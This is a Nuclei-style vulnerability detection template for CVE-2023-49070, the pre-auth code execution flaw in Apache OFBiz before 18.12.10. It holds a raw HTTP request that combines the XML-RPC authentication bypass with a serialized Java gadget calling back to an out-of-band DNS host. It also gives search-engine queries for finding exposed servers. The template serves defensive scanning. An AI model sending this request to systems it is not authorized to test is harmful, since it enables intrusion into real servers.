65 lines
2.1 KiB
YAML
65 lines
2.1 KiB
YAML
id: CVE-2023-49070
|
|
|
|
info:
|
|
name: Apache OFBiz < 18.12.10 - Arbitrary Code Execution
|
|
author: your3cho
|
|
severity: critical
|
|
description: |
|
|
Pre-auth RCE in Apache Ofbiz 18.12.09. It's due to XML-RPC no longer maintained still present. This issue affects Apache OFBiz: before 18.12.10.
|
|
remediation: Users are recommended to upgrade to version 18.12.10.
|
|
reference:
|
|
- https://lists.apache.org/thread/jmbqk2lp4t4483whzndp5xqlq4f3otg3
|
|
- https://seclists.org/oss-sec/2023/q4/257
|
|
- https://twitter.com/Siebene7/status/1731870759130427726
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-49070
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-49070
|
|
cwe-id: CWE-94
|
|
metadata:
|
|
max-request: 1
|
|
vendor: apache
|
|
product: ofbiz
|
|
fofa-query: app="Apache_OFBiz"
|
|
shodan-query: html:"OFBiz"
|
|
tags: cve,cve2023,apache,ofbiz,deserialization,rce
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/xml
|
|
|
|
<?xml version="1.0"?>
|
|
<methodCall>
|
|
<methodName>{{randstr}}</methodName>
|
|
<params>
|
|
<param>
|
|
<value>
|
|
<struct>
|
|
<member>
|
|
<name>test</name>
|
|
<value>
|
|
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">{{generate_java_gadget("dns", "http://{{interactsh-url}}", "base64")}}</serializable>
|
|
</value>
|
|
</member>
|
|
</struct>
|
|
</value>
|
|
</param>
|
|
</params>
|
|
</methodCall>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<name>faultString</name>'
|
|
# digest: 4b0a0048304602210093b4cf24331571d100a9a5c0980250419244d2014bfb421c9293ae49ec204712022100f4ac4a156570eaf2afcfbc024cb2b5a19dbba30109402525dd6a3e86d88672d3:922c64590222798bb761d5b6d8e72950 |